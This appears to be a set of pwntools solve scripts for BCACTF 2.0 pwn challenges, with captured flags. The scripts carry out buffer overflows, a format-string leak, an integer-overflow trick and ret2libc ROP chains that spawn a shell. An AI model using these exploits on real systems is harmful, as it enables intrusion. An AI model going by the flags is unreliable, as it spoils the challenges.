BCACTF 2.0
from pwn import *
# p = process('./adv-analysis')
p = remote('bin.bcactf.com', 49156)

# The service expects this exact pledge string (NUL-terminated). Everything
# after it up to offset 0x48 is filler (presumably the rest of the buffer
# plus the saved rbp — confirm in the binary), and the next 8 bytes land on
# the saved return address. 0x401216 is a fixed address because a 0x40xxxx
# text address implies the binary is not PIE.
PLEDGE = b'i pledge to not cheat\0'
RETURN_ADDR_OFFSET = 0x48
TARGET = 0x401216

overflow = PLEDGE + b'\0' * (RETURN_ADDR_OFFSET - len(PLEDGE)) + p64(TARGET)
p.sendline(overflow)
p.interactive()
# bcactf{corresponding_parts_of_congurent_triangles_are_congruent_ie_CPCCTCPTPPTCTC}
from pwn import *
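# Dump the stack through a format-string bug: '%<i>$p' prints the i-th
# argument slot as a pointer, so one request leaks one 8-byte stack word.
# A fresh connection is opened per slot because each run of the binary only
# formats once.
r = b''
for i in range(20, 40):
    # p = process('./amer-lit', aslr = False)
    # Context manager so the socket is closed even if a recv raises
    # (the original only closed on the happy path).
    with remote('bin.bcactf.com', 49157) as p:
        # Send bytes explicitly; recent pwntools warns on str payloads.
        p.sendline(f'%{i}$p'.encode())
        p.recvuntil(b':')
        # Four lines of response precede the echoed format output.
        for _ in range(4):
            p.recvline()
        # The echoed line carries 6 bytes of prefix and 5 bytes of suffix
        # around the hex pointer (presumably '0x' is inside the prefix —
        # verify against the binary's output format). The hex digits are the
        # big-endian rendering of a little-endian stack word, so reverse the
        # decoded bytes to recover the raw stack contents.
        hex_word = p.recvline()[6:-5].decode()
        r += bytes.fromhex(hex_word)[::-1]
        print(repr(r))
# bcactf{totally_not_employing_the_use_of_generic_words_to_reach_the_required_word_limit_nope_not_me}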
from pwn import *
# p = process('./ap-abcs')
p = remote('bin.bcactf.com', 49154)

# p32 implies a 32-bit target: 0x4c bytes of NUL filler reach the word of
# interest, which is then overwritten with 0x73434241. That value is the
# little-endian encoding of b'ABCs', so it presumably satisfies an equality
# check in the binary rather than acting as a code address — confirm.
FILLER_LEN = 0x50 - 4
overflow = b''.join((b'\0' * FILLER_LEN, p32(0x73434241)))
p.sendline(overflow)
p.interactive()
# bcactf{bca_is_taking_APs_in_june_aaaaaaaa_wish_past_me_luck}
from pwn import *
# p = process('./bca-mart')
p = remote('bin.bcactf.com', 49153)

# Scripted menu walk. The quantity 1073741832 is 0x40000008: presumably
# chosen so that quantity * price wraps in 32-bit arithmetic and the cost
# check passes with a tiny total — confirm against the binary's math.
MENU_ANSWERS = ('1', '1073741832', '6', '1')
for answer in MENU_ANSWERS:
    p.sendlineafter('>', answer)
p.interactive()
# bcactf{bca_store??_wdym_ive_never_heard_of_that_one_before}
from pwn import *
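# p = process('./notesearch')
p = remote('bin.bcactf.com', 49159)
e = ELF('./notesearch')
# This must be the libc the REMOTE service links against. A local copy only
# works when the build matches exactly; the page-offset check after the leak
# catches a mismatch before we compute (and send) garbage addresses.
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')

# Gadgets from the binary itself (0x40xxxx addresses imply non-PIE, so they
# are fixed).
pop_rdi = 0x0000000000401703
pop_rsi = 0x0000000000401701  # unused by this chain; kept for reference
ret = 0x000000000040101a      # lone `ret`, used as a stack-alignment pad

# Bytes from the start of the overflowed buffer to the saved return address.
RET_OFFSET = 0x78


def rop_chain(*words: int) -> bytes:
    """Return the overflow padding followed by *words* packed as 64-bit LE."""
    return b'a' * RET_OFFSET + b''.join(p64(w) for w in words)


# Stage 1: puts(puts@GOT) prints the runtime address of puts, then return
# into main so the buffer can be overflowed a second time.
p.sendline(rop_chain(pop_rdi, e.got['puts'], e.plt['puts'], e.sym['main']))
p.recvuntil(b'end of')
p.recvline()
# puts() stops at the first NUL byte, so a user-space pointer arrives as at
# most 6 bytes; pad back to 8 before unpacking.
libc_leak = u64(p.recvline()[:-1].ljust(8, b'\0'))

# ASLR shifts libc by whole pages, so the low 12 bits of any libc symbol are
# a property of the build, not of the run. If they differ from our local
# libc's puts, we are using the wrong libc and nothing below can work.
if (libc_leak & 0xfff) != (libc.sym['puts'] & 0xfff):
    log.error(f'leaked puts {libc_leak:#x} does not match local libc puts '
              f'{libc.sym["puts"]:#x}: wrong libc build for this remote')

libc_base = libc_leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(libc_leak))
print(hex(libc_base))
print(hex(system))
print(hex(binsh))

# Stage 2: system("/bin/sh"). The extra `ret` shifts rsp by 8 so it is
# 16-byte aligned when system() is entered (presumably needed because glibc's
# system() uses aligned SSE stores — the usual movaps crash otherwise).
p.sendline(rop_chain(pop_rdi, binsh, ret, system))
p.interactive()
# bcactf{jose!_yeah_you!_why_dont_you_play_us_a_Bbbb?}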
from pwn import *
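context.log_level = 'debug'
# p = process('./discrete')
p = remote('bin.bcactf.com', 49160)
e = ELF('./discrete')
# Must match the libc of the REMOTE service; a local copy is only valid when
# the build is identical. The page-offset check below verifies that before
# any address derived from it is trusted.
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')

# Gadgets from the non-PIE binary (fixed 0x40xxxx addresses).
pop_rdi = 0x00000000004017a3
pop_rsi = 0x00000000004017a1  # unused by this chain; kept for reference
ret = 0x000000000040101a      # lone `ret`, used as a stack-alignment pad
main = 0x401611               # hard-coded; the binary is presumably stripped of the symbol

# The program expects this exact string first; the frame is 0x48 bytes up to
# the saved return address.
PROMISE = b'i will get an A'
RET_OFFSET = 0x48


def rop_chain(*words: int) -> bytes:
    """Return the expected prefix, NUL padding, then *words* packed as 64-bit LE."""
    return PROMISE.ljust(RET_OFFSET, b'\0') + b''.join(p64(w) for w in words)


# Stage 1: leak puts via puts(puts@GOT) and return to main for a second
# overflow.
p.sendline(rop_chain(pop_rdi, e.got['puts'], e.plt['puts'], main))
p.recvuntil(b'Good luck.\n')
# puts() stops at the first NUL, so the pointer arrives as <= 6 bytes.
libc_leak = u64(p.recvline()[:-1].ljust(8, b'\0'))

# ASLR only moves libc by whole pages: the low 12 bits of puts must equal
# those in our local libc, otherwise we have the wrong build and every
# computed address would be wrong.
if (libc_leak & 0xfff) != (libc.sym['puts'] & 0xfff):
    log.error(f'leaked puts {libc_leak:#x} does not match local libc puts '
              f'{libc.sym["puts"]:#x}: wrong libc build for this remote')

libc_base = libc_leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(libc_leak))
print(hex(libc_base))

# Stage 2: system("/bin/sh"), with a `ret` pad so rsp is 16-byte aligned on
# entry to system() (presumably required by glibc's aligned SSE stores).
p.sendline(rop_chain(pop_rdi, binsh, ret, system))
p.interactive()
# bcactf{the_limit_as_t_approaches_the_ctf_of_my_sanity_approaches_0}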
from pwn import *
# p = process('./honors-abcs', aslr=False)
p = remote('bin.bcactf.com', 49155)

# p32 implies a 32-bit target: 0x4c bytes of 'b' filler, then the next
# 4-byte word is overwritten with 0x10101010. Whether that word is a saved
# return address or a compared value is not visible here — check the binary.
# The prompt ends in 'for 1:', so wait for it before sending.
FILLER = b'b' * (0x50 - 4)
overflow = FILLER + p32(0x10101010)
p.sendlineafter('for 1:', overflow)
p.interactive()
# bcactf{now_i_know_my_A_B_Cs!!_next_time_wont_you_cheat_with_me??}
from pwn import *
# p = process('./analysis', aslr=False)
p = remote('bin.bcactf.com', 49158)

# 0x48 bytes of filler reach the saved return address, which is redirected
# to 0x401256. A 0x40xxxx address implies the binary is not PIE, so no leak
# is needed; the aslr=False above only matters for the local process run.
RET_OFFSET = 0x48
TARGET = 0x401256

overflow = b''.join((b'a' * RET_OFFSET, p64(TARGET)))
p.sendline(overflow)
p.interactive()
# bcactf{challenges_are_just_functions_mapping_from_coffee_to_points}